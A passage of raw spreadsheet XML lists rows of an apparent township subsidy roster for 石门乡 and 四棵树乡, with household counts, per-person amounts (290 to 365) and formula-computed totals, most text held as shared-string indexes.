        <v>5398</v>
      </c>
      <c r="C2323" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2323" s="17" t="s">
        <v>6088</v>
      </c>
      <c r="E2323" s="17" t="s">
        <v>6089</v>
      </c>
      <c r="F2323" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2323" s="17">
        <v>1</v>
      </c>
      <c r="H2323" s="18">
        <v>365</v>
      </c>
      <c r="I2323" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2323" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K2323" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2324" customHeight="1" spans="1:22">
      <c r="A2324" s="16" t="s">
        <v>6090</v>
      </c>
      <c r="B2324" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2324" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2324" s="17" t="s">
        <v>6091</v>
      </c>
      <c r="E2324" s="17" t="s">
        <v>5446</v>
      </c>
      <c r="F2324" s="17" t="s">
        <v>6092</v>
      </c>
      <c r="G2324" s="17">
        <v>1</v>
      </c>
      <c r="H2324" s="18">
        <v>365</v>
      </c>
      <c r="I2324" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2324" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K2324" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2325" customHeight="1" spans="1:22">
      <c r="A2325" s="16" t="s">
        <v>6093</v>
      </c>
      <c r="B2325" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2325" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2325" s="17" t="s">
        <v>6094</v>
      </c>
      <c r="E2325" s="17" t="s">
        <v>5426</v>
      </c>
      <c r="F2325" s="17" t="s">
        <v>6095</v>
      </c>
      <c r="G2325" s="17">
        <v>1</v>
      </c>
      <c r="H2325" s="18">
        <v>365</v>
      </c>
      <c r="I2325" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2325" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K2325" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2326" customHeight="1" spans="1:22">
      <c r="A2326" s="16" t="s">
        <v>6096</v>
      </c>
      <c r="B2326" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2326" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2326" s="17" t="s">
        <v>6097</v>
      </c>
      <c r="E2326" s="17" t="s">
        <v>6098</v>
      </c>
      <c r="F2326" s="121" t="s">
        <v>6095</v>
      </c>
      <c r="G2326" s="17">
        <v>1</v>
      </c>
      <c r="H2326" s="18">
        <v>365</v>
      </c>
      <c r="I2326" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2326" s="29">
        <v>45627</v>
      </c>
      <c r="K2326" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2326" s="5"/>
    </row>
    <row r="2327" customHeight="1" spans="1:22">
      <c r="A2327" s="16" t="s">
        <v>6099</v>
      </c>
      <c r="B2327" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2327" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2327" s="17" t="s">
        <v>6100</v>
      </c>
      <c r="E2327" s="17" t="s">
        <v>5532</v>
      </c>
      <c r="F2327" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2327" s="17">
        <v>1</v>
      </c>
      <c r="H2327" s="18">
        <v>365</v>
      </c>
      <c r="I2327" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2327" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2327" s="17" t="s">
        <v>225</v>
      </c>
      <c r="M2327" s="5"/>
      <c r="N2327" s="5"/>
      <c r="O2327" s="5"/>
      <c r="P2327" s="5"/>
      <c r="Q2327" s="5"/>
      <c r="R2327" s="5"/>
      <c r="S2327" s="5"/>
      <c r="T2327" s="5"/>
      <c r="U2327" s="5"/>
      <c r="V2327" s="5"/>
    </row>
    <row r="2328" s="5" customFormat="1" customHeight="1" spans="1:22">
      <c r="A2328" s="16" t="s">
        <v>6101</v>
      </c>
      <c r="B2328" s="82" t="s">
        <v>5398</v>
      </c>
      <c r="C2328" s="82" t="s">
        <v>6064</v>
      </c>
      <c r="D2328" s="83" t="s">
        <v>6102</v>
      </c>
      <c r="E2328" s="84" t="s">
        <v>6103</v>
      </c>
      <c r="F2328" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2328" s="17">
        <v>1</v>
      </c>
      <c r="H2328" s="18">
        <v>365</v>
      </c>
      <c r="I2328" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2328" s="78" t="s">
        <v>3094</v>
      </c>
      <c r="K2328" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L2328" s="6"/>
      <c r="M2328" s="6"/>
      <c r="N2328" s="6"/>
      <c r="O2328" s="6"/>
      <c r="P2328" s="6"/>
      <c r="Q2328" s="6"/>
      <c r="R2328" s="6"/>
      <c r="S2328" s="6"/>
      <c r="T2328" s="6"/>
      <c r="U2328" s="6"/>
      <c r="V2328" s="6"/>
    </row>
    <row r="2329" customHeight="1" spans="1:22">
      <c r="A2329" s="16" t="s">
        <v>6104</v>
      </c>
      <c r="B2329" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2329" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2329" s="17" t="s">
        <v>6105</v>
      </c>
      <c r="E2329" s="17" t="s">
        <v>5550</v>
      </c>
      <c r="F2329" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2329" s="17">
        <v>1</v>
      </c>
      <c r="H2329" s="18">
        <v>365</v>
      </c>
      <c r="I2329" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2329" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2329" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2330" customHeight="1" spans="1:22">
      <c r="A2330" s="16" t="s">
        <v>6106</v>
      </c>
      <c r="B2330" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2330" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="D2330" s="17" t="s">
        <v>6108</v>
      </c>
      <c r="E2330" s="17" t="s">
        <v>6109</v>
      </c>
      <c r="F2330" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2330" s="17">
        <v>3</v>
      </c>
      <c r="H2330" s="18">
        <v>290</v>
      </c>
      <c r="I2330" s="17">
        <f t="shared" si="112"/>
        <v>870</v>
      </c>
      <c r="J2330" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2330" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2331" customHeight="1" spans="1:22">
      <c r="A2331" s="16" t="s">
        <v>6111</v>
      </c>
      <c r="B2331" s="17" t="str">
        <f>B2330</f>
        <v>石门乡</v>
      </c>
      <c r="C2331" s="17" t="str">
        <f>C2330</f>
        <v>石门乡</v>
      </c>
      <c r="D2331" s="25" t="s">
        <v>6112</v>
      </c>
      <c r="E2331" s="32" t="s">
        <v>6113</v>
      </c>
      <c r="F2331" s="17" t="str">
        <f>F2330</f>
        <v>4113210920</v>
      </c>
      <c r="G2331" s="17"/>
      <c r="H2331" s="17"/>
      <c r="I2331" s="17"/>
      <c r="J2331" s="17"/>
      <c r="K2331" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2332" customHeight="1" spans="1:22">
      <c r="A2332" s="16" t="s">
        <v>6114</v>
      </c>
      <c r="B2332" s="17" t="str">
        <f>B2331</f>
        <v>石门乡</v>
      </c>
      <c r="C2332" s="17" t="str">
        <f>C2331</f>
        <v>石门乡</v>
      </c>
      <c r="D2332" s="25" t="s">
        <v>6115</v>
      </c>
      <c r="E2332" s="32" t="s">
        <v>6116</v>
      </c>
      <c r="F2332" s="17" t="str">
        <f>F2331</f>
        <v>4113210920</v>
      </c>
      <c r="G2332" s="17"/>
      <c r="H2332" s="17"/>
      <c r="I2332" s="17"/>
      <c r="J2332" s="17"/>
      <c r="K2332" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2333" customHeight="1" spans="1:22">
      <c r="A2333" s="16" t="s">
        <v>6117</v>
      </c>
      <c r="B2333" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2333" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="D2333" s="17" t="s">
        <v>6118</v>
      </c>
      <c r="E2333" s="17" t="s">
        <v>6119</v>
      </c>
      <c r="F2333" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2333" s="17">
        <v>1</v>
      </c>
      <c r="H2333" s="18">
        <v>365</v>
      </c>
      <c r="I2333" s="17">
        <f>H2333*G2333</f>
        <v>365</v>
      </c>
      <c r="J2333" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2333" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2334" customHeight="1" spans="1:22">
      <c r="A2334" s="16" t="s">
        <v>6120</v>
      </c>
      <c r="B2334" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2334" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2334" s="17" t="s">
        <v>6121</v>
      </c>
      <c r="E2334" s="17" t="s">
        <v>6122</v>
      </c>
      <c r="F2334" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2334" s="17">
        <v>1</v>
      </c>
      <c r="H2334" s="18">
        <v>365</v>
      </c>
      <c r="I2334" s="17">
        <f>H2334*G2334</f>
        <v>365</v>
      </c>
      <c r="J2334" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2334" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2335" customHeight="1" spans="1:22">
      <c r="A2335" s="16" t="s">
        <v>6123</v>
      </c>
      <c r="B2335" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2335" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2335" s="17" t="s">
        <v>6124</v>
      </c>
      <c r="E2335" s="17" t="s">
        <v>6125</v>
      </c>
      <c r="F2335" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2335" s="17">
        <v>1</v>
      </c>
      <c r="H2335" s="18">
        <v>365</v>
      </c>
      <c r="I2335" s="17">
        <f>H2335*G2335</f>
        <v>365</v>
      </c>
      <c r="J2335" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2335" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2336" customHeight="1" spans="1:22">
      <c r="A2336" s="16" t="s">
        <v>6126</v>
      </c>
      <c r="B2336" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2336" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2336" s="17" t="s">
        <v>6128</v>
      </c>
      <c r="E2336" s="17" t="s">
        <v>1473</v>
      </c>
      <c r="F2336" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2336" s="17">
        <v>1</v>
      </c>
      <c r="H2336" s="18">
        <v>365</v>
      </c>
      <c r="I2336" s="17">
        <f>H2336*G2336</f>
        <v>365</v>
      </c>
      <c r="J2336" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2336" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2337" customHeight="1" spans="1:11">
      <c r="A2337" s="16" t="s">
        <v>6129</v>
      </c>
      <c r="B2337" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2337" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2337" s="17" t="s">
        <v>6130</v>
      </c>
      <c r="E2337" s="17" t="s">
        <v>6131</v>
      </c>
      <c r="F2337" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2337" s="17">
        <v>2</v>
      </c>
      <c r="H2337" s="18">
        <v>325</v>
      </c>
      <c r="I2337" s="17">
        <f>H2337*G2337</f>
        <v>650</v>
      </c>
      <c r="J2337" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2337" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2338" customHeight="1" spans="1:11">
      <c r="A2338" s="16" t="s">
        <v>6132</v>
      </c>
      <c r="B2338" s="17" t="str">
        <f>B2337</f>
        <v>石门乡</v>
      </c>
      <c r="C2338" s="17" t="str">
        <f>C2337</f>
        <v>粮食局</v>
      </c>
      <c r="D2338" s="81" t="s">
        <v>6133</v>
      </c>
      <c r="E2338" s="81" t="s">
        <v>6134</v>
      </c>
      <c r="F2338" s="17" t="str">
        <f>F2337</f>
        <v>4113210920</v>
      </c>
      <c r="G2338" s="17"/>
      <c r="H2338" s="17"/>
      <c r="I2338" s="17"/>
      <c r="J2338" s="17"/>
      <c r="K2338" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2339" customHeight="1" spans="1:11">
      <c r="A2339" s="16" t="s">
        <v>6135</v>
      </c>
      <c r="B2339" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2339" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2339" s="17" t="s">
        <v>6136</v>
      </c>
      <c r="E2339" s="17" t="s">
        <v>6137</v>
      </c>
      <c r="F2339" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2339" s="17">
        <v>1</v>
      </c>
      <c r="H2339" s="18">
        <v>365</v>
      </c>
      <c r="I2339" s="17">
        <f t="shared" ref="I2339:I2347" si="113">H2339*G2339</f>
        <v>365</v>
      </c>
      <c r="J2339" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2339" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2340" customHeight="1" spans="1:11">
      <c r="A2340" s="16" t="s">
        <v>6138</v>
      </c>
      <c r="B2340" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2340" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="D2340" s="17" t="s">
        <v>6139</v>
      </c>
      <c r="E2340" s="17" t="s">
        <v>6140</v>
      </c>
      <c r="F2340" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2340" s="17">
        <v>1</v>
      </c>
      <c r="H2340" s="18">
        <v>365</v>
      </c>
      <c r="I2340" s="17">
        <f t="shared" si="113"/>
        <v>365</v>
      </c>
      <c r="J2340" s="17" t="s">
        <v>6141</v>
      </c>
      <c r="K2340" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2341" customHeight="1" spans="1:11">
      <c r="A2341" s="16" t="s">
        <v>6142</v>
      </c>
      <c r="B2341" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2341" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2341" s="17" t="s">
        <v>6143</v>
      </c>
      <c r="E2341" s="17" t="s">
        <v>6144</v>
      </c>
      <c r="F2341" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2341" s="17">
        <v>1</v>
      </c>
      <c r="H2341" s="18">
        <v>365</v>
      </c>
      <c r="I2341" s="17">
        <f t="shared" si="113"/>
        <v>365</v>
      </c>
      <c r="J2341" s="17" t="s">
        <v>6141</v>
      </c>
      <c r="K2341" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2342" customHeight="1" spans="1:11">
      <c r="A2342" s="16" t="s">
        <v>6145</v>
      </c>
      <c r="B2342" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2342" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2342" s="17" t="s">
        <v>6146</v>
      </c>
      <c r="E2342" s="17" t="s">
        <v>3097</v>
      </c>
      <c r="F2342" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2342" s="17">
        <v>1</v>
      </c>
      <c r="H2342" s="18">
        <v>365</v>
      </c>
      <c r="I2342" s="17">
        <f t="shared" si="113"/>
        <v>365</v>
      </c>
      <c r="J2342" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2342" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2343" customHeight="1" spans="1:11">
      <c r="A2343" s="16" t="s">
        <v>6147</v>
      </c>
      <c r="B2343" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2343" s="85" t="s">
        <v>3436</v>
      </c>
      <c r="D2343" s="86" t="s">
        <v>6148</v>
      </c>
      <c r="E2343" s="31" t="s">
        <v>6149</v>
      </c>
      <c r="F2343" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2343" s="17">
        <v>1</v>
      </c>
      <c r="H2343" s="18">
        <v>365</v>
      </c>
      <c r="I2343" s="17">
        <f t="shared" si="113"/>
        <v>365</v>
      </c>
      <c r="J2343" s="87" t="s">
        <v>3094</v>
      </c>
      <c r="K2343" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2344" customHeight="1" spans="1:11">
      <c r="A2344" s="16" t="s">
        <v>6150</v>
      </c>
      <c r="B2344" s="17" t="s">
        <v>6107</v>
      </c>
      <c r="C2344" s="17" t="s">
        <v>6151</v>
      </c>
      <c r="D2344" s="17" t="s">
        <v>6152</v>
      </c>
      <c r="E2344" s="17" t="s">
        <v>6153</v>
      </c>
      <c r="F2344" s="17" t="s">
        <v>6110</v>
      </c>
      <c r="G2344" s="17">
        <v>2</v>
      </c>
      <c r="H2344" s="18">
        <v>325</v>
      </c>
      <c r="I2344" s="17">
        <f t="shared" si="113"/>
        <v>650</v>
      </c>
      <c r="J2344" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2344" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2345" customHeight="1" spans="1:11">
      <c r="A2345" s="16" t="s">
        <v>6154</v>
      </c>
      <c r="B2345" s="17" t="str">
        <f>B2344</f>
        <v>石门乡</v>
      </c>
      <c r="C2345" s="17" t="str">
        <f>C2344</f>
        <v>电管所</v>
      </c>
      <c r="D2345" s="81" t="s">
        <v>6155</v>
      </c>
      <c r="E2345" s="81" t="s">
        <v>6156</v>
      </c>
      <c r="F2345" s="17" t="str">
        <f>F2344</f>
        <v>4113210920</v>
      </c>
      <c r="G2345" s="17"/>
      <c r="H2345" s="17"/>
      <c r="I2345" s="17"/>
      <c r="J2345" s="17"/>
      <c r="K2345" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2346" customHeight="1" spans="1:11">
      <c r="A2346" s="16" t="s">
        <v>6157</v>
      </c>
      <c r="B2346" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2346" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2346" s="17" t="s">
        <v>6160</v>
      </c>
      <c r="E2346" s="17" t="s">
        <v>6161</v>
      </c>
      <c r="F2346" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2346" s="17">
        <v>1</v>
      </c>
      <c r="H2346" s="18">
        <v>365</v>
      </c>
      <c r="I2346" s="17">
        <f>H2346*G2346</f>
        <v>365</v>
      </c>
      <c r="J2346" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2346" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2347" customHeight="1" spans="1:11">
      <c r="A2347" s="16" t="s">
        <v>6163</v>
      </c>
      <c r="B2347" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2347" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2347" s="17" t="s">
        <v>6164</v>
      </c>
      <c r="E2347" s="17" t="s">
        <v>6165</v>
      </c>
      <c r="F2347" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2347" s="17">
        <v>1</v>
      </c>
      <c r="H2347" s="18">
        <v>365</v>
      </c>
      <c r="I2347" s="17">
        <f>H2347*G2347</f>
        <v>365</v>
      </c>
      <c r="J2347" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2347" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2348" customHeight="1" spans="1:11">
      <c r="A2348" s="16" t="s">
        <v>6166</v>
      </c>
      <c r="B2348" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2348" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2348" s="17" t="s">
        <v>6167</v>
      </c>
      <c r="E2348" s="17" t="s">
        <v>6168</v>
      </c>
      <c r="F2348" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2348" s="17">
        <v>1</v>
      </c>
      <c r="H2348" s="18">
        <v>365</v>
      </c>
      <c r="I2348" s="17">
        <f>H2348*G2348</f>
        <v>365</v>
      </c>
      <c r="J2348" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2348" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2349" customHeight="1" spans="1:11">
      <c r="A2349" s="16" t="s">
        <v>6169</v>
      </c>
      <c r="B2349" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2349" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2349" s="17" t="s">
        <v>6170</v>
      </c>
      <c r="E2349" s="17" t="s">
        <v>6171</v>
      </c>
      <c r="F2349" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2349" s="17">
        <v>1</v>
      </c>
      <c r="H2349" s="18">
        <v>365</v>
      </c>
      <c r="I2349" s="17">
        <f>H2349*G2349</f>
        <v>365</v>
      </c>
      <c r="J2349" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2349" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2350" customHeight="1" spans="1:11">
      <c r="A2350" s="16" t="s">
        <v>6172</v>
      </c>
      <c r="B2350" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2350" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2350" s="17" t="s">
        <v>6173</v>
      </c>
      <c r="E2350" s="17" t="s">
        <v>6174</v>
      </c>
      <c r="F2350" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2350" s="17">
        <v>3</v>
      </c>
      <c r="H2350" s="18">
        <v>290</v>
      </c>
      <c r="I2350" s="17">
        <f>H2350*G2350</f>
        <v>870</v>
      </c>
      <c r="J2350" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2350" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2351" customHeight="1" spans="1:11">
      <c r="A2351" s="16" t="s">
        <v>6175</v>
      </c>
      <c r="B2351" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2351" s="17" t="str">
        <f>C2350</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2351" s="88" t="s">
        <v>6176</v>
      </c>
      <c r="E2351" s="88" t="s">
        <v>6177</v>
      </c>
      <c r="F2351" s="17" t="str">
        <f>F2350</f>
        <v>4113211125</v>
      </c>
      <c r="G2351" s="17"/>
      <c r="H2351" s="17"/>
      <c r="I2351" s="17"/>
      <c r="J2351" s="17"/>
      <c r="K2351" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2352" customHeight="1" spans="1:11">
      <c r="A2352" s="16" t="s">
        <v>6178</v>
      </c>
      <c r="B2352" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2352" s="17" t="str">
        <f>C2351</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2352" s="51" t="s">
        <v>6179</v>
      </c>
      <c r="E2352" s="51" t="s">
        <v>6180</v>
      </c>
      <c r="F2352" s="17" t="str">
        <f>F2351</f>
        <v>4113211125</v>
      </c>
      <c r="G2352" s="17"/>
      <c r="H2352" s="17"/>
      <c r="I2352" s="17"/>
      <c r="J2352" s="17"/>
      <c r="K2352" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2353" customHeight="1" spans="1:11">
      <c r="A2353" s="16" t="s">
        <v>6181</v>
      </c>
      <c r="B2353" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2353" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2353" s="17" t="s">
        <v>6182</v>
      </c>
      <c r="E2353" s="17" t="s">
        <v>6183</v>
      </c>
      <c r="F2353" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2353" s="17">
        <v>2</v>
      </c>
      <c r="H2353" s="18">
        <v>325</v>
      </c>
      <c r="I2353" s="17">
        <f>H2353*G2353</f>
        <v>650</v>
      </c>
      <c r="J2353" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2353" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2354" customHeight="1" spans="1:11">
      <c r="A2354" s="16" t="s">
        <v>6184</v>
      </c>
      <c r="B2354" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2354" s="17" t="str">
        <f>C2353</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2354" s="88" t="s">
        <v>2095</v>
      </c>
      <c r="E2354" s="88" t="s">
        <v>2710</v>
      </c>
      <c r="F2354" s="17" t="str">
        <f>F2353</f>
        <v>4113211125</v>
      </c>
      <c r="G2354" s="17"/>
      <c r="H2354" s="17"/>
      <c r="I2354" s="17"/>
      <c r="J2354" s="17"/>
      <c r="K2354" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2355" customHeight="1" spans="1:11">
      <c r="A2355" s="16" t="s">
        <v>6185</v>
      </c>
      <c r="B2355" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2355" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2355" s="17" t="s">
        <v>6186</v>
      </c>
      <c r="E2355" s="17" t="s">
        <v>6187</v>
      </c>
      <c r="F2355" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2355" s="17">
        <v>1</v>
      </c>
      <c r="H2355" s="18">
        <v>365</v>
      </c>
      <c r="I2355" s="17">
        <f>H2355*G2355</f>
        <v>365</v>
      </c>
      <c r="J2355" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2355" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2356" customHeight="1" spans="1:11">
      <c r="A2356" s="16" t="s">
        <v>6188</v>
      </c>
      <c r="B2356" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2356" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2356" s="17" t="s">
        <v>6189</v>
      </c>
      <c r="E2356" s="17" t="s">
        <v>6190</v>
      </c>
      <c r="F2356" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2356" s="17">
        <v>1</v>
      </c>
      <c r="H2356" s="18">
        <v>365</v>
      </c>
      <c r="I2356" s="17">
        <f>H2356*G2356</f>
        <v>365</v>
      </c>
      <c r="J2356" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2356" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2357" customHeight="1" spans="1:11">
      <c r="A2357" s="16" t="s">
        <v>6191</v>
      </c>
      <c r="B2357" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2357" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2357" s="17" t="s">
        <v>6192</v>
      </c>
      <c r="E2357" s="17" t="s">
        <v>6193</v>
      </c>
      <c r="F2357" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2357" s="17">
        <v>3</v>
      </c>
      <c r="H2357" s="18">
        <v>290</v>
      </c>
      <c r="I2357" s="17">
        <f>H2357*G2357</f>
        <v>870</v>
      </c>
      <c r="J2357" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2357" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2358" customHeight="1" spans="1:11">
      <c r="A2358" s="16" t="s">
        <v>6194</v>
      </c>
      <c r="B2358" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2358" s="17" t="str">
        <f>C2357</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2358" s="88" t="s">
        <v>6195</v>
      </c>
      <c r="E2358" s="88" t="s">
        <v>6196</v>
      </c>
      <c r="F2358" s="17" t="str">
        <f>F2357</f>
        <v>4113211125</v>
      </c>
      <c r="G2358" s="17"/>
      <c r="H2358" s="17"/>
      <c r="I2358" s="17"/>
      <c r="J2358" s="17"/>
      <c r="K2358" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2359" customHeight="1" spans="1:11">
      <c r="A2359" s="16" t="s">
        <v>6197</v>
      </c>
      <c r="B2359" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2359" s="17" t="str">
        <f>C2358</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2359" s="23" t="s">
        <v>6198</v>
      </c>
      <c r="E2359" s="24" t="s">
        <v>6199</v>
      </c>
      <c r="F2359" s="17" t="str">
        <f>F2358</f>
        <v>4113211125</v>
      </c>
      <c r="G2359" s="17"/>
      <c r="H2359" s="17"/>
      <c r="I2359" s="17"/>
      <c r="J2359" s="17"/>
      <c r="K2359" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2360" customHeight="1" spans="1:11">
      <c r="A2360" s="16" t="s">
        <v>6200</v>
      </c>
      <c r="B2360" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2360" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2360" s="17" t="s">
        <v>6201</v>
      </c>
      <c r="E2360" s="17" t="s">
        <v>6202</v>
      </c>
      <c r="F2360" s="17" t="s">
        <v>6162</v>
      </c>
      <c r="G2360" s="17">
        <v>1</v>
      </c>
      <c r="H2360" s="18">
        <v>365</v>
      </c>
      <c r="I2360" s="17">
        <f>H2360*G2360</f>
        <v>365</v>
      </c>
      <c r="J2360" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2360" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2361" customHeight="1" spans="1:11">
      <c r="A2361" s="16" t="s">
        <v>6203</v>
      </c>
      <c r="B2361" s="17" t="s">
        <v>6158</v>
      </c>
      <c r="C2361" s="17" t="s">
        <v>6159</v>
      </c>
      <c r="D2361" s="17" t="s">
        <v>6204</v>
      </c>
      <c r="E2361" s="17" t="s">
        <v>6161</v>
      </c>
